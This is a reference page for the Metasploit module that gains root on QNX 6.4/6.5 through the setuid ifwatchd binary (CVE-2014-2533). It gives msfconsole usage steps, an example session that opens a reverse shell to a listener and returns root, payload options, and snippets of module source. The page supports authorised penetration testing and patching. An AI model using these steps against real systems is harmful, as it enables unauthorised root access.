ifwatchd Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/qnx/local/ifwatchd_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ifwatchd Privilege Escalation
Module: exploit/qnx/local/ifwatchd_priv_esc
Source code: modules/exploits/qnx/local/ifwatchd_priv_esc.rb
Disclosure date: 2014-03-10
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-2533
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x systems by exploiting the ifwatchd suid executable. ifwatchd allows users to specify scripts to execute using the '-A' command line argument; however, it does not drop privileges when executing user-supplied scripts, resulting in execution of arbitrary commands as root. This module has been tested successfully on QNX Neutrino 6.5.0 (x86) and 6.5.0 SP1 (x86).
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/qnx/local/ifwatchd_priv_esc
msf exploit(ifwatchd_priv_esc) > show targets
... a list of targets ...
msf exploit(ifwatchd_priv_esc) > set TARGET target-id
msf exploit(ifwatchd_priv_esc) > show options
... show and set options ...
msf exploit(ifwatchd_priv_esc) > set SESSION session-id
msf exploit(ifwatchd_priv_esc) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Description
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
systems by exploiting the ifwatchd
suid executable.
Vulnerable Application
ifwatchd
allows users to specify scripts to execute using the -A
command line argument; however, it does not drop privileges when
executing user-supplied scripts, resulting in execution of arbitrary
commands as root.
This module has been tested successfully on:
- QNX Neutrino 6.5.0 (x86)
- QNX Neutrino 6.5.0 SP1 (x86)
QNX Neutrino 6.5.0 Service Pack 1 is available here:
- http://www.qnx.com/download/feature.html?programid=23665
Verification Steps
- Start
msfconsole
use exploit/qnx/local/ifwatchd_priv_esc
set session <ID>
run
- You should get a root session
Options
SESSION
Which session to use, which can be viewed with sessions
WritableDir
A writable directory file system path. (default: /tmp
)
Scenarios
msf5 > use exploit/qnx/local/ifwatchd_priv_esc
msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1
session => 1
msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(qnx/local/ifwatchd_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Writing interface arrival event script...
[*] Executing /sbin/ifwatchd...
[*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400
id
uid=100(test) gid=100 euid=0(root)
uname -a
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
Go back to menu.
Msfconsole Usage
Here is how the qnx/local/ifwatchd_priv_esc exploit module looks in the msfconsole:
msf6 > use exploit/qnx/local/ifwatchd_priv_esc
[*] Using configured payload cmd/unix/reverse_awk
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show info
Name: ifwatchd Privilege Escalation
Module: exploit/qnx/local/ifwatchd_priv_esc
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-03-10
Provided by:
cenobyte
Tim Brown
bcoles <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
systems by exploiting the ifwatchd suid executable. ifwatchd allows
users to specify scripts to execute using the '-A' command line
argument; however, it does not drop privileges when executing
user-supplied scripts, resulting in execution of arbitrary commands
as root. This module has been tested successfully on QNX Neutrino
6.5.0 (x86) and 6.5.0 SP1 (x86).
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-2533
http://www.securityfocus.com/bid/66449
https://www.exploit-db.com/exploits/32153
http://seclists.org/bugtraq/2014/Mar/66
Module Options
This is a complete list of options available in the qnx/local/ifwatchd_priv_esc exploit:
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show options
Module options (exploit/qnx/local/ifwatchd_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (cmd/unix/reverse_awk):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the qnx/local/ifwatchd_priv_esc exploit:
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show advanced
Module advanced options (exploit/qnx/local/ifwatchd_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 10 no Additional delay in seconds to wait for a session
WritableDir /tmp yes A directory where we can write files
Payload advanced options (cmd/unix/reverse_awk):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the qnx/local/ifwatchd_priv_esc module can exploit:
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the qnx/local/ifwatchd_priv_esc exploit:
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
2 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
Evasion Options
Here is the full list of possible evasion options supported by the qnx/local/ifwatchd_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<IFWATCHD_PATH> is not setuid
Here is a relevant code snippet related to the "<IFWATCHD_PATH> is not setuid" error message:
75: datastore['WritableDir']
76: end
77:
78: def check
79: unless setuid? ifwatchd_path
80: vprint_error "#{ifwatchd_path} is not setuid"
81: return CheckCode::Safe
82: end
83: vprint_good "#{ifwatchd_path} is setuid"
84:
85: CheckCode::Detected
Target not vulnerable
Here is a relevant code snippet related to the "Target not vulnerable" error message:
85: CheckCode::Detected
86: end
87:
88: def exploit
89: unless check == CheckCode::Detected
90: fail_with Failure::NotVulnerable, 'Target not vulnerable'
91: end
92:
93: if is_root?
94: fail_with Failure::BadConfig, 'Session already has root privileges'
95: end
Session already has root privileges
Here is a relevant code snippet related to the "Session already has root privileges" error message:
89: unless check == CheckCode::Detected
90: fail_with Failure::NotVulnerable, 'Target not vulnerable'
91: end
92:
93: if is_root?
94: fail_with Failure::BadConfig, 'Session already has root privileges'
95: end
96:
97: unless writable? base_dir
98: fail_with Failure::BadConfig, "#{base_dir} is not writable"
99: end
<BASE_DIR> is not writable
Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:
93: if is_root?
94: fail_with Failure::BadConfig, 'Session already has root privileges'
95: end
96:
97: unless writable? base_dir
98: fail_with Failure::BadConfig, "#{base_dir} is not writable"
99: end
100:
101: script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
102:
103: print_status 'Writing interface arrival event script...'
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #11234 Merged Pull Request: revisionism
- #9745 Merged Pull Request: Add ifwatchd Privilege Escalation exploit module
References
See Also
Check also the following modules related to this module:
Authors
- cenobyte
- Tim Brown
- bcoles
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.